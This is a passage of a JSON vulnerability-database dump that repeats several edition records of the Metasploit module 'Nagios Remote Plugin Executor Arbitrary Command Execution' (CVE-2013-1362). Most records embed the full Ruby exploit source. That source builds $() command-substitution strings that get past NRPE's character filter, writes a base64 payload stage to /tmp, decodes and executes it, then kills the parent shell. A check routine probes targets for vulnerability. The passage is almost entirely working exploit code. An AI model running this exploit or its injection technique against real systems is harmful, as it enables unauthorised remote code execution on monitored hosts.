\"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-06-01T21:53:50", "differentElements": ["modified", "published"], "edition": 75}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-07-20T20:47:30", "history": [], "viewCount": 102, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-07-20T20:47:30", "differentElements": ["modified", "published"], "edition": 76}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-07-20T22:51:23", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-07-20T22:51:23", "differentElements": ["modified", "published"], "edition": 77}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-01T13:05:21", "history": [], "viewCount": 103, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-01T13:05:21", "differentElements": ["modified", "published"], "edition": 78}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-01T15:01:23", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-01T15:01:23", "differentElements": ["modified", "published"], "edition": 79}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor 